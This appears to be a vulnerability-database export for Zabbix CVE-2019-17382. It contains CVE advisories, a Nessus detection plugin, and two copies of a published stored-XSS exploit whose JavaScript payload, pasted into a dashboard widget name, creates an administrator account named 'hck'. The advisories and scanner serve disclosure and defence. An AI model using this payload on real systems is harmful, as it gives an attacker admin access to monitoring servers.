{"ubuntucve": [{"lastseen": "2023-09-01T18:59:13", "description": "An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1\nin Zabbix through 4.4. An attacker can bypass the login page and access the\ndashboard page, and then create a Dashboard, Report, Screen, or Map without\nany Username/Password (i.e., anonymously). All created elements\n(Dashboard/Report/Screen/Map) are accessible by other users and by an\nadmin.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | Disputed by upstream and closed as not a security bug. This issue can be avoided by disabling guest account.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-10-09T00:00:00", "type": "ubuntucve", "title": "CVE-2019-17382", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17382"], "modified": "2019-10-09T00:00:00", "id": "UB:CVE-2019-17382", "href": "https://ubuntu.com/security/CVE-2019-17382", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "debiancve": [{"lastseen": "2023-09-09T03:17:24", "description": "An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.", "cvss3": {}, "published": "2019-10-09T14:15:00", "type": "debiancve", "title": "CVE-2019-17382", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-17382"], "modified": "2019-10-09T14:15:00", "id": "DEBIANCVE:CVE-2019-17382", "href": "https://security-tracker.debian.org/tracker/CVE-2019-17382", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-10-08T00:48:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-03-30T00:00:00", "type": "zdt", "title": "Zabbix 3.4.7 - Stored XSS Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17382"], "modified": "2021-03-30T00:00:00", "id": "1337DAY-ID-36059", "href": "https://0day.today/exploit/description/36059", "sourceData": "# Exploit Title: Zabbix 3.4.7 - Stored XSS\r\n# Exploit Author: Radmil Gazizov\r\n# Vendor Homepage: https://www.zabbix.com/\r\n# Software Link: https://www.zabbix.com/rn/rn3.4.7\r\n# Version: 3.4.7\r\n# Tested on: Linux\r\n\r\n# Reference -\r\nhttps://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt\r\n\r\n1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)\r\n2- Create new dashboard\r\n3- Add a new widget => Type: Map nabigation tree\r\n4- Past into parameter \"Name\": <img src=\"x\" onerror=\"var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});\">\r\n5- Click to \"Add\" button\n\n# 0day.today [2021-10-08] #", "sourceHref": "https://0day.today/exploit/36059", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2023-08-30T23:15:51", "description": "An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-10-09T14:15:00", "type": "cve", "title": "CVE-2019-17382", "cwe": ["CWE-639"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17382"], "modified": "2023-08-22T19:15:00", "cpe": ["cpe:/a:zabbix:zabbix:4.4"], "id": "CVE-2019-17382", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17382", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zabbix:zabbix:4.4:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-03-31T14:42:10", "description": "", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "packetstorm", "title": "Zabbix 3.4.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-17382"], "modified": "2021-03-31T00:00:00", "id": "PACKETSTORM:162032", "href": "https://packetstormsecurity.com/files/162032/Zabbix-3.4.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Zabbix 3.4.7 - Stored XSS \n# Date: 30-03-2021 \n# Exploit Author: Radmil Gazizov \n# Vendor Homepage: https://www.zabbix.com/ \n# Software Link: https://www.zabbix.com/rn/rn3.4.7 \n# Version: 3.4.7 \n# Tested on: Linux \n \n# Reference - \nhttps://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt \n \n1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382) \n2- Create new dashboard \n3- Add a new widget => Type: Map nabigation tree \n4- Past into parameter \"Name\": <img src=\"x\" onerror=\"var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});\"> \n5- Click to \"Add\" button \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/162032/zabbix347-xss.txt"}], "nessus": [{"lastseen": "2023-09-05T08:11:54", "description": "The remote Debian 10 host has a package installed that is affected by multiple vulnerabilities as referenced in the dla-3538 advisory.\n\n - Zabbix before 5.0 represents passwords in the users table with unsalted MD5. (CVE-2013-7484)\n\n - An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. (CVE-2019-17382)\n\n - An authenticated user can create a link with reflected Javascript code inside it for the discovery page and send it to other users. The payload can be executed only with a known CSRF token value of the victim, which is changed periodically and is difficult to predict. (CVE-2022-35229)\n\n - Zabbix Frontend provides a feature that allows admins to maintain the installation and ensure that only certain IP addresses can access it. In this way, any user will not be able to access the Zabbix Frontend while it is being maintained and possible sensitive data will be prevented from being disclosed. An attacker can bypass this protection and access the instance using IP address not listed in the defined range. (CVE-2022-43515)\n\n - JavaScript pre-processing can be used by the attacker to gain access to the file system (read-only access on behalf of user zabbix) on the Zabbix Server or Zabbix Proxy, potentially leading to unauthorized access to sensitive data. (CVE-2023-29450)\n\n - Specially crafted string can cause a buffer overrun in the JSON parser library leading to a crash of the Zabbix Server or a Zabbix Proxy. (CVE-2023-29451)\n\n - Stored or persistent cross-site scripting (XSS) is a type of XSS where the attacker first sends the payload to the web application, then the application saves the payload (e.g., in a database or server-side text files), and finally, the application unintentionally executes the payload for every victim visiting its web pages. (CVE-2023-29454)\n\n - Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. (CVE-2023-29455)\n\n - URL validation scheme receives input from a user and then parses it to identify its various components.\n The validation scheme can ensure that all URL components comply with internet standards. (CVE-2023-29456)\n\n - Reflected XSS attacks, occur when a malicious script is reflected off a web application to the victim's browser. The script can be activated through Action form fields, which can be sent as request to a website with a vulnerability that enables execution of malicious scripts. (CVE-2023-29457)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-08-22T00:00:00", "type": "nessus", "title": "Debian DLA-3538-1 : zabbix - LTS security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7484", "CVE-2019-17382", "CVE-2022-35229", "CVE-2022-43515", "CVE-2023-29450", "CVE-2023-29451", "CVE-2023-29454", "CVE-2023-29455", "CVE-2023-29456", "CVE-2023-29457"], "modified": "2023-08-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:zabbix", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DLA-3538.NASL", "href": "https://www.tenable.com/plugins/nessus/180038", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-3538. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(180038);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/22\");\n\n script_cve_id(\n \"CVE-2013-7484\",\n \"CVE-2019-17382\",\n \"CVE-2022-35229\",\n \"CVE-2022-43515\",\n \"CVE-2023-29450\",\n \"CVE-2023-29451\",\n \"CVE-2023-29454\",\n \"CVE-2023-29455\",\n \"CVE-2023-29456\",\n \"CVE-2023-29457\"\n );\n\n script_name(english:\"Debian DLA-3538-1 : zabbix - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 10 host has a package installed that is affected by multiple vulnerabilities as referenced in the\ndla-3538 advisory.\n\n - Zabbix before 5.0 represents passwords in the users table with unsalted MD5. (CVE-2013-7484)\n\n - An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An\n attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report,\n Screen, or Map without any Username/Password (i.e., anonymously). All created elements\n (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. (CVE-2019-17382)\n\n - An authenticated user can create a link with reflected Javascript code inside it for the discovery page\n and send it to other users. The payload can be executed only with a known CSRF token value of the victim,\n which is changed periodically and is difficult to predict. (CVE-2022-35229)\n\n - Zabbix Frontend provides a feature that allows admins to maintain the installation and ensure that only\n certain IP addresses can access it. In this way, any user will not be able to access the Zabbix Frontend\n while it is being maintained and possible sensitive data will be prevented from being disclosed. An\n attacker can bypass this protection and access the instance using IP address not listed in the defined\n range. (CVE-2022-43515)\n\n - JavaScript pre-processing can be used by the attacker to gain access to the file system (read-only access\n on behalf of user zabbix) on the Zabbix Server or Zabbix Proxy, potentially leading to unauthorized\n access to sensitive data. (CVE-2023-29450)\n\n - Specially crafted string can cause a buffer overrun in the JSON parser library leading to a crash of the\n Zabbix Server or a Zabbix Proxy. (CVE-2023-29451)\n\n - Stored or persistent cross-site scripting (XSS) is a type of XSS where the attacker first sends the\n payload to the web application, then the application saves the payload (e.g., in a database or server-side\n text files), and finally, the application unintentionally executes the payload for every victim visiting\n its web pages. (CVE-2023-29454)\n\n - Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected\n off a web application to the victim's browser. The script is activated through a link, which sends a\n request to a website with a vulnerability that enables execution of malicious scripts. (CVE-2023-29455)\n\n - URL validation scheme receives input from a user and then parses it to identify its various components.\n The validation scheme can ensure that all URL components comply with internet standards. (CVE-2023-29456)\n\n - Reflected XSS attacks, occur when a malicious script is reflected off a web application to the victim's\n browser. The script can be activated through Action form fields, which can be sent as request to a website\n with a vulnerability that enables execution of malicious scripts. (CVE-2023-29457)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1026847\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/zabbix\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2023/dla-3538\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-7484\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2019-17382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-35229\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-43515\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-29450\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-29451\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-29454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-29455\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-29456\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-29457\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the zabbix packages.\n\nFor Debian 10 buster, these problems have been fixed in version 1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17382\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-43515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(10)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 10.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '10.0', 'prefix': 'zabbix', 'reference': '1:4.0.4+dfsg-1+deb10u2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'zabbix');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}